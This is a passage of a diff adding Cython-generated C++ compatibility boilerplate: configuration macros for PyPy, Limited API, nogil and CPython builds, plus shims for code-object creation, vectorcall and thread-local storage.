CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if 